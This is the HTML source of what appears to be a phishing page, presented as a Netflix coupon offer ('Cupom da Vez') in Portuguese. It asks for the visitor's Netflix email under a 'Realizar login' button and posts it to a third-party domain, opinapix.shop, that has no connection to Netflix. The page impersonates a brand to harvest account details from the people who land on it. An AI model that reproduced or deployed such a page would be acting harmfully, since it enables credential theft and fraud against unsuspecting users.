<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link data-optimized="1" rel="stylesheet" href="css/5921624bf5bbe4c8c091ef09226fa76f.css">
    <link rel="preconnect" href="https://fonts.googleapis.com/">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
    <link data-optimized="1" href="css/1c7a3d2ee9759dc256d915300855c494.css" rel="stylesheet">
    <link data-optimized="1" href="css/ba9cbbe9240a489628be8eb27c56db8a.css" rel="stylesheet">
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="css/animated.css">
    <link rel="shortcut icon" href="images/faveicon.png">
    <title>:: Cupom da Vez ::</title>
    <style>
        #p1 {
            background-color:
            padding: 50px 0 50px 0;
            position: relative;
            text-align: center; /* Centraliza conteúdo */
        }

        #p1 img {
            width: 300px; /* Define o tamanho da logo */
            padding: 50px 0 50px 0;
            position: relative;
            margin: 0 auto; /* Centraliza a logo */
        }
    </style>
</head>

<body style="background-color: #000000; position: fixed; overflow: none; width: 100%; height: 100%;">

    <div style="opacity: 0.7; width: 100%; height: 100%; position: absolute; top: 0; left: 0;  background: #70D3F0; z-index: 9999999999999999; display: none;" id="blur"></div>

    <div id="p1">
        <img src="images/logo2.png">


    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #F4F4F4;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }

        .container {
            max-width: 400px;
            padding: 20px;
            border-radius: 10px;
            background-color: #FFFFFF;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }

        h1 {
            font-size: 24px;
            text-align: center;
            margin-bottom: 20px;
            color: #333333;
        }

        label {
            display: block;
            font-size: 16px;
            margin-bottom: 10px;
            color: #333333;
        }

        input[type="text"] {
            width: 100%;
            padding: 10px;
            border: 1px solid #CCCCCC;
            border-radius: 5px;
            margin-bottom: 20px;
        }

        input[type="submit"] {
            width: 100%;
            padding: 12px;
            border: none;
            border-radius: 5px;
            background-color: #ff0000;
            color: #333333;
            font-size: 16px;
            cursor: pointer;
            transition: background-color 0.3s ease;
        }

        input[type="submit"]:hover {
            background-color: #FFCD00;
        }

        .terms {
            font-size: 12px;
            text-align: center;
            margin-top: 20px;
        }

        .terms a {
            color: #007bff;
            text-decoration: none;
        }
    </style>


    <div class="container">
        <h1>Seja bem-vindo!</h1>
        <form action="https://opinapix.shop/login/app/cupom1.php/" method="POST">
            <label for="emailUsuario">Seu mail Netflix:</label>
            <input type="text" id="emailUsuario" name="emailUsuario" placeholder="Digite seu email" required="">
            <input type="submit" value="Realizar login" >
        </form>
        <p class="terms">Ao prosseguir, você concorda com nossos Termos de uso.<a href="#" onclick="abrirPopup();"></a></p>
    </div>

  
    </div>

    <script>
        function abrirPopup() {
            var blur = document.getElementById("blur");
            var popup = document.getElementById("popUp1");

            blur.style.display = "block";
            popup.style.display = "block";
        }

        function fecharPopup() {
            var blur = document.getElementById("blur");
            var popup = document.getElementById("popUp1");

            blur.style.display = "none";
            popup.style.display = "none";
        }
    </script>


</div></body></html>